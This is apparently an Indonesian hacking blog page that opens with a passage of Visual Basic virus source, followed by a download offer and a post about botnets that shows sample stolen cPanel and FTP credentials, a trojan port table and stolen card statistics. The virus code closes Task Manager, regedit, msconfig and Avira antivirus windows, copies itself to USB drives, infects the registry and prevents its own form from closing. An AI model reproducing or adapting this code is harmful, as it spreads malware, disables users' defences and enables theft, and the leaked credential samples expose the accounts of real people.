If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
End Sub

Private Sub Timer3_Timer()
On Error Resume Next
‘menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow(“#32770″, “RUN”) ‘jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “System Configuration Utility”) ‘msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Windows Task Manager”) ‘task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“RegEdit_RegEdit”, vbNullString) ‘regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TMainForm”, vbNullString) ‘aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TApplication”, vbNullString) ‘aplikasi buatan Delphi
SendMessage FWnd, WM_CLOSE, 0&, 0&
End Sub

Private Sub Timer4_Timer()
‘cari flashdisk
On Error Resume Next
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
FlashDisk = (Drive1.List(i))
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For
End If
Next
GandaKeFlashDisk ‘
End Sub

Private Sub Timer5_Timer()
On Error Resume Next
InfeksiRegistry
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa
‘menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
Timer4.Enabled = True
End If
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub

Silahkan Download Project Di Download/Upload Gratis Join 4Shared Now!

Dangerous – BotNet 0

Agung Dwi Prasetyo | 13.18.00 | , ,

Pastinya semua sudah tau apa itu BotNet! Klo belum tau ni saya kasi clue dah..

BotNet merupakan sebuah zombie penggerak system yang bisa digunakan untuk keperluan DDOS, Logging, Recover, dsb.

Dan untuk saat ini, BinusHacker Team mencoba dan meneliti beberapa project BotNet yang bisa sangat berbahaya. BotNet terdiri dari masing² platform yang harus secompatible mungkin untuk bisa berjalan dengan baik pada masing² OS. Misalkan untuk Windows dan Unix* yang sekarang banyak digunakan.

BotNet Trojan

Kalau sebuah system sudah terkena BotNet Trojan, maka komputer tersebut akan mengirimkan beberapa Informasi log dari system. Dimana kita juga bisa mengontrol komputer target. Apabila dalam sebuah Windows Server maka kita bisa menggunakan Remote Desktop untuk bisa mengaksesnya. Dan apabila pada unix maka kita bisa mengambil logging password root. Kemudian kita bisa menggunakan remote login dari hak akses root.

BotNet biasanya dibangun menggunakan MBR (master boot record). Sebuah rootkit yang dilaksanakan pada waktu boot, sebelum sistem operasi dibuka. Setelah mesin terinfeksi, maka hasil panen malware dan upload data dalam 20 menit akan dikirimkan. Data yang dicuri termasuk e-mail account, Windows / Unix password, dan FTP credentials POP / SMTP account, Control Panel, dll.

Adapun contoh hasil dari traced pengiriman email dari BotNet:

Hasil dari informasi akan diterima dan direport dalam Computer Server Attacker, sehingga Informasi yang masuk bisa disimpan dan dimanipulasi.

Bagaimana hal tersebut bisa terjadi, buat semua orang berhati hatilah karena saat ini begitu banyak cara untuk mendapatkan Informasi. Dan yang paling berbahaya apabila ada Account Privacy anda ada didalam sana. Misalkan Paypal, LR, Atau Bank Account Yang ada di Email Anda. Sungguh sangat berbahaya!

Berikut ini hanyalah contoh sebuah email account yg bisa kita ambil, dimana disana kita bisa backdoor, recover password dan sebagainya, bisa anda bayangkan sendiri:

Contoh Control Panel Information sebuah website yang bisa didapat:

               Cpanel Username:        fh_609986                Cpanel Password:        loft1234                FTP Server :            ftp.***host.org                FTP Login :             fh_609986                FTP Password :          loft1234                MySQL Database Name:    MUST CREATE IN CPANEL                MySQL Username :        fh_609986                MySQL Password :        loft1234                MySQL Server:           SEE THE CPANEL                 POP3 Server : mail.***host.org                 POP3 Username : fh_609986

Contoh FTP Account yang diterima dari BotNet Zombie sebagai berikut:

FTP Server:  ***.**host.com FTP Login:  ***.**host.com FTP Password:  l1nuxus3r E-mail Account Information: E-mail accounts that you add: POP3/IMAP Host Address: (depends on hostname you use for the e-mail account, i.e your domain or subdomain). SMTP Host Address: (check if you have this option enabled)

Berikut logging aktifitas dalam system ketika DDOS berjalan:

A frequent visitor sent me the following table:      Port  Protocol    Keyword                  D e s c r i p t i o n      1     tcp         tcpmux                   TCP Port Multiplexer      1     udp         SocketsdesTroie          [trojan] Sockets Troie      1     udp         tcpmux                   TCP Port Multiplexer      2     tcp         compressnet              Management Utility      2     tcp         Death                    [trojan] Death      2     udp         compressnet              Management Utility      3     tcp         compressnet              Compression Process      3     udp         compressnet              Compression Process      5     tcp         rje                      Remote Job Entry      5     udp         rje                      Remote Job Entry      7     tcp         echo                     Echo      9     tcp         discard                  Discard     11     tcp         systat                   Active Users     11     udp         systat                   Active Users     13     tcp         daytime                  Daytime     13     udp         daytime                  Daytime     15     tcp         netstat                  Netstat     15     tcp         B2                       [trojan] B2     17     tcp         qo                       TDQuote of the Day     17     udp         qo                       TDQuote of the Day     18     tcp         msp                      Message Send Protocol     18     udp         msp                      Message Send Protocol     19     tcp         chargen                  Character Generator     19     udp         chargen                  Character Generator     20     tcp         ftp-data                 File Transfer     20     udp         ftp-data                 File Transfer     20     tcp         SennaSpyFTPserver        [trojan] Senna Spy FTP     21     tcp         ftp                      File Transfer [Control]     21     udp         ftp                      File Transfer [Control]     21     tcp         BackConstruction         [trojan] Back Construction     21     tcp         BladeRunner              [trojan] BladeRunner     21     tcp         CCInvader                [trojan] CC Invader     21     tcp         DarkFTP                  [trojan] Dark FTP     21     tcp         DolyTrojan               [trojan] Doly Trojan     21     tcp         Fore                     [trojan] Fore     21     tcp         InvisibleFTP             [trojan] Invisible FTP     21     tcp         Juggernaut42             [trojan] Juggernaut 42     21     tcp         Larva                    [trojan] Larva     21     tcp         MotIvFTP                 [trojan] MotIv FTP     21     tcp         NetAdministrator         [trojan] Net Administrator

Yang Paling Berbahaya, Informasi Yang Diperoleh Dari BotNet adalah terdapat dan bisa di extractnya 1660 unit kartu kredit dan kartu debit dari kumpulan data yang diterima. Geolocation melalui alamat IP, dipastikan bahwa 49% dari nomor kartu berasal dari korban di AS, 12% dari Italia, dan 8% dari Spanyol, dengan 40 negara-negara lain. Yang paling umum termasuk kartu Visa (1056), MasterCard (447), American Express (81), Maestro (36), dan yang lainnya termasuk Bank Account, dsb (24). Yang menarik disana adalah bahwa 80% dari kartu kredit tersebut adalah kartu yang terdapat dalam database yang biasanya digunakan untuk processing online order.

Jadi jika anda memiliki komputer dan berselancar di internet, berhati²lah dengan spyware, malware, dan BotNet zombie yang sangat berbahaya bagi Privacy Anda terutama menyangkut Data diri, Email, Login, Password, Username, dsb. Sebaiknya anda melakukan check log + memperhatikan proses yang sedang berjalan pada komputer Anda. Jika ada yang mencurigakan segera beri tindakan. Jika anda sudah mendapatkankan info ini, diharapkan anda bisa share ke yang lainnya dan anda bisa menghindari resiko yang akan timbul.

===================[ EOF ]=====================


 
HardCode Copyright © 2012 Prozine Theme is Designed by Agoenk Home | RSS Feed | Comment RSS